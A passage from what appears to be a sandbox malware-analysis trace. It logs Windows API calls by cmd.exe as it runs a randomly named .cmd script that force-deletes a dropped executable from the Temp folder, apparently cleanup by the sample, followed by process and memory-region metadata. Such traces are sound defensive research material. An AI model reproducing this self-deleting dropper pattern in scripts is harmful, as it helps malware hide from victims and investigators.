_Format="%08X", _ArgList=0x1ceb60 | out: _Buffer="00000000") returned 8 [0126.543] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0126.543] GetEnvironmentStringsW () returned 0x342c28* [0126.544] FreeEnvironmentStringsW (penv=0x342c28) returned 1 [0126.544] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0126.544] GetEnvironmentStringsW () returned 0x342c28* [0126.544] FreeEnvironmentStringsW (penv=0x342c28) returned 1 [0126.544] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cebb8 | out: lpAttributeList=0x1cebb8) [0126.544] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.544] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.544] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.544] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.544] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.544] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.544] SetConsoleInputExeNameW () returned 0x1 [0126.544] GetConsoleOutputCP () returned 0x1b5 [0126.544] GetCPInfo (in: CodePage=0x1b5, 
lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.544] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.545] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\p0mhde5x.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cf3d4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0126.545] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0126.545] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.545] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0126.545] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.545] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0126.546] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1cf3b8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1cf3b8*=0x7c, lpOverlapped=0x0) returned 1 [0126.547] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0126.547] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\n") returned 62 [0126.547] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.547] GetFileType (hFile=0x54) returned 0x1 [0126.547] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.547] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0126.548] _tell (_FileHandle=3) returned 83 [0126.548] _close (_FileHandle=3) returned 0 
[0126.548] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1cf18c | out: _Buffer="\r\n") returned 2 [0126.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.548] GetFileType (hFile=0x7) returned 0x2 [0126.549] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.549] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf14c | out: lpMode=0x1cf14c) returned 1 [0126.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.549] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf178, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf178*=0x2) returned 1 [0126.549] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0126.549] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0126.549] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1cf188 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0126.549] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x1cf188 | out: _Buffer=">") returned 1 [0126.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.549] GetFileType (hFile=0x7) returned 0x2 [0126.549] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.549] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf150 | out: lpMode=0x1cf150) returned 1 [0126.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.549] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x1cf17c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x1cf17c*=0x19) returned 1 [0126.550] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.550] GetFileType (hFile=0x7) returned 0x2 [0126.550] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.550] GetConsoleMode (in: 
hConsoleHandle=0x7, lpMode=0x1cf3d4 | out: lpMode=0x1cf3d4) returned 1 [0126.550] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.550] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x34f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x1cf400, lpReserved=0x0 | out: lpBuffer=0x34f008*, lpNumberOfCharsWritten=0x1cf400*=0x3) returned 1 [0126.550] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1cf40c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" ") returned 58 [0126.550] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.550] GetFileType (hFile=0x7) returned 0x2 [0126.550] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.550] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf3cc | out: lpMode=0x1cf3cc) returned 1 [0126.550] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.550] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x1cf3f8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf3f8*=0x3a) returned 1 [0126.551] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1cf42c | out: _Buffer="\r\n") returned 2 [0126.551] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.551] GetFileType (hFile=0x7) returned 0x2 [0126.551] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.551] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf3ec | out: lpMode=0x1cf3ec) returned 1 [0126.551] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.551] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf418, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf418*=0x2) returned 1 [0126.551] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0126.551] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0126.551] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0126.551] 
GetConsoleTitleW (in: lpConsoleTitle=0x1cef9c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.551] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ce014, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ce018, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ce014*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0126.552] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0126.552] _wcsicmp (_String1="GYm4NxCU.exe", _String2=".") returned 57 [0126.552] _wcsicmp (_String1="GYm4NxCU.exe", _String2="..") returned 57 [0126.552] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x2020 [0126.552] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0126.552] _wcsicmp (_String1="GYm4NxCU.exe", _String2=".") returned 57 [0126.552] _wcsicmp (_String1="GYm4NxCU.exe", _String2="..") returned 57 [0126.552] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x2020 [0126.552] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe", fInfoLevelId=0x0, lpFindFileData=0x350554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x350554) returned 0x330aa8 [0126.552] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 1 [0126.553] FindNextFileW (in: hFindFile=0x330aa8, lpFindFileData=0x350554 | out: lpFindFileData=0x350554) returned 0 [0126.553] GetLastError () 
returned 0x12 [0126.553] FindClose (in: hFindFile=0x330aa8 | out: hFindFile=0x330aa8) returned 1 [0126.554] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.554] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.554] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.554] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.554] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.554] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.554] SetConsoleInputExeNameW () returned 0x1 [0126.554] GetConsoleOutputCP () returned 0x1b5 [0126.554] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.554] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.554] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\p0mhde5x.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cf3d4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0126.554] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0126.555] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.555] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0126.555] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.555] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0126.555] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1cf3b8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1cf3b8*=0x3e, lpOverlapped=0x0) returned 1 [0126.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, 
cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\n") returned 62 [0126.555] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.555] GetFileType (hFile=0x54) returned 0x1 [0126.555] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.555] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.556] _tell (_FileHandle=3) returned 145 [0126.556] _close (_FileHandle=3) returned 0 [0126.556] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1cf18c | out: _Buffer="\r\n") returned 2 [0126.556] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.556] GetFileType (hFile=0x7) returned 0x2 [0126.556] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.556] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf14c | out: lpMode=0x1cf14c) returned 1 [0126.557] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.557] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf178, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf178*=0x2) returned 1 [0126.557] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0126.557] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1cf188 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0126.557] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x1cf188 | out: _Buffer=">") returned 1 [0126.557] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.557] GetFileType (hFile=0x7) returned 0x2 [0126.557] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.557] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf150 | out: lpMode=0x1cf150) returned 1 [0126.557] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.557] WriteConsoleW (in: 
hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x1cf17c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x1cf17c*=0x19) returned 1 [0126.557] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.557] GetFileType (hFile=0x7) returned 0x2 [0126.558] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.558] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf3d4 | out: lpMode=0x1cf3d4) returned 1 [0126.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.558] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x34f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x1cf400, lpReserved=0x0 | out: lpBuffer=0x34f008*, lpNumberOfCharsWritten=0x1cf400*=0x3) returned 1 [0126.558] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1cf40c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" ") returned 58 [0126.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.558] GetFileType (hFile=0x7) returned 0x2 [0126.558] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.558] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf3cc | out: lpMode=0x1cf3cc) returned 1 [0126.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.558] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x1cf3f8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf3f8*=0x3a) returned 1 [0126.558] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1cf42c | out: _Buffer="\r\n") returned 2 [0126.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.558] GetFileType (hFile=0x7) returned 0x2 [0126.559] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.559] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf3ec | out: lpMode=0x1cf3ec) returned 1 [0126.559] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.559] WriteConsoleW (in: hConsoleOutput=0x7, 
lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf418, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf418*=0x2) returned 1 [0126.559] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0126.559] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0126.559] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0126.559] GetConsoleTitleW (in: lpConsoleTitle=0x1cef9c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.559] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ce014, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ce018, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ce014*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0126.559] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0126.559] _wcsicmp (_String1="GYm4NxCU.exe", _String2=".") returned 57 [0126.560] _wcsicmp (_String1="GYm4NxCU.exe", _String2="..") returned 57 [0126.560] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0xffffffff [0126.560] GetLastError () returned 0x2 [0126.560] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0126.560] _wcsicmp (_String1="GYm4NxCU.exe", _String2=".") returned 57 [0126.560] _wcsicmp (_String1="GYm4NxCU.exe", _String2="..") returned 57 [0126.560] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0xffffffff [0126.560] GetLastError () returned 0x2 [0126.560] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe", fInfoLevelId=0x0, lpFindFileData=0x350554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x350554) returned 0xffffffff [0126.560] GetLastError () returned 0x2 [0126.560] _get_osfhandle (_FileHandle=2) returned 0xb [0126.560] GetFileType (hFile=0xb) returned 0x2 [0126.560] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0126.560] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cea14 | out: lpMode=0x1cea14) returned 1 [0126.560] _get_osfhandle (_FileHandle=2) returned 0xb [0126.560] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1cea48 | out: lpConsoleScreenBufferInfo=0x1cea48) returned 1 [0126.561] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0126.561] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.561] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.561] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.561] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.561] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.561] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.562] SetConsoleInputExeNameW () returned 0x1 [0126.562] GetConsoleOutputCP () returned 0x1b5 [0126.562] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.562] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.562] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\p0mhde5x.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cf3d4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 
[0126.562] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0126.562] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.562] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.562] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.562] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.562] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1cf3b8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1cf3b8*=0x0, lpOverlapped=0x0) returned 1 [0126.562] GetLastError () returned 0x0 [0126.562] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.562] GetFileType (hFile=0x54) returned 0x1 [0126.562] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.562] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.563] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.563] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.563] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1cf39c, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1cf39c*=0x0, lpOverlapped=0x0) returned 1 [0126.563] GetLastError () returned 0x0 [0126.563] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.563] GetFileType (hFile=0x54) returned 0x1 [0126.563] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.563] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.563] longjmp () [0126.563] _tell (_FileHandle=3) returned 145 [0126.563] _close (_FileHandle=3) returned 0 [0126.563] CmdBatNotification 
() returned 0x0 [0126.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.563] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.563] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.564] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.564] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.564] SetConsoleInputExeNameW () returned 0x1 [0126.564] GetConsoleOutputCP () returned 0x1b5 [0126.564] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.564] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.564] exit (_Code=0) Process: id = "61" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16840" os_pid = "0xec8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "57" os_parent_pid = "0xe5c" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8803 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8804 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8805 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000130000" filename = "" Region: id = 8806 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 8807 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 8808 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8809 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8810 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8811 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 8812 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8899 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8900 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8901 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 8902 start_va = 0x280000 end_va = 0x2e6fff entry_point = 0x280000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: 
